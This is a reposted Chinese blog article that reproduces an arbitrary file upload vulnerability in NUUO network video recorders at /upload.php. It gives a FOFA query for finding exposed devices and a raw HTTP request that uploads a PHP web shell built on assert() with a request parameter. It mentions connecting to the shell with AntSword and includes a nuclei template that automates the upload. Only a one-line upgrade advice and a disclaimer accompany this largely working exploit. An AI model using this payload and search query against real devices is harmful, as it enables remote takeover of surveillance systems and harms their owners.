当前位置: 首页 > article >正文

NUUO网络视频录像机upload.php任意文件上传漏洞复现

article 2025/1/20 5:51:25

文章目录

    • 免责声明
    • 漏洞描述
    • 搜索语法
    • 漏洞复现
    • nuclei
    • 修复建议

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

NUUO网络视频录像机(Network Video Recorder,简称NVR)是NUUO Inc.生产的一种专业视频监控设备,它广泛应用于零售、交通、教育、政府和银行等多个领域。能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能。它采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求。在upload接口处存在文件上传漏洞

在这里插入图片描述

搜索语法

fofa

body="www.nuuo.com/eHelpdesk.php"

漏洞复现

在接口处进行文件上传 /upload.php

POST /upload.php HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------ok4o88lom
accept: */*
Content-Length: 163

----------ok4o88lom
Content-Disposition: form-data; name="userfile"; filename="test.php"

<?php $code=$_REQUEST['777'];
assert($code);?>
----------ok4o88lom--

在这里插入图片描述

访问test.php 文件使用蚁剑进行测试
在这里插入图片描述

nuclei

id: NUUO-Network-Camera-uploadfile

info:
  name: uploadfile of NUUO
  author: xl
  severity: info
  tags: tags

http:
  - raw:
      - "POST /upload.php HTTP/1.1\nHost: \nCache-Control: max-age=0\nAccept-Language:\
        \ zh-CN\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT\
        \ 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100\
        \ Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n\
        Accept-Encoding: gzip, deflate, br\nConnection: keep-alive\nContent-Type:\
        \ multipart/form-data; boundary=--------ok4o88lom\naccept: */*\nContent-Length:\
        \ 163\n\n----------ok4o88lom\nContent-Disposition: form-data; name=\"userfile\"\
        ; filename=\"test.php\"\n\n<?php $code=$_REQUEST['777'];\nassert($code);?>\n\
        ----------ok4o88lom--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - test.php
      - type: status
        status:
          - 200

修复建议

升级到最新版本


http://www.kler.cn/a/370563.html

相关文章:

  • 【大数据】机器学习------支持向量机(SVM)
  • 于灵动的变量变幻间:函数与计算逻辑的浪漫交织(下)
  • 软考高级5个资格、中级常考4个资格简介及难易程度排序
  • 异步 HTTP 请求
  • Perl语言的数据库编程
  • wireshark抓路由器上的包 抓包路由器数据
  • 边缘计算网关在储能领域的应用-天拓四方
  • 【对比学习】正交阵/酉矩阵,对称矩阵/Hermite矩阵,正交相似对角化/奇异值分解的内在联系
  • 部署DNS主从服务器
  • go.mod 与go.sum作用
  • CSS进阶
  • HarmonyOS 组件样式@Style 、 @Extend、自定义扩展(AttributeModifier、AttributeUpdater)
  • 再识用户中心
  • Log4Net配置详解及输出自定义消息类示例代码
  • VSCode 中拼写检查排除某些单词
  • DiskMirror TCP服务器与客户端的使用
  • poi处理excel文档时,与lombok的@Accessors(chain = true)注解冲突
  • 10.24.2024刷华为OD C题型(四) -- 对象list按照多个属性排序
  • Python xlrd库介绍
  • 双十一宠物空气净化器应该怎么选?自用适合养宠物家庭的空气净化器推荐
  • python数据处理常用操作
  • ArrayList简单的洗牌算法
  • C++Socket通讯样例(服务端)
  • Vue 权限管理
  • STM32 第3章 如何用串口下载程序
  • 快消品行业数字化转型:定制开发 S2B2C 商城小程序的主战场选择与突破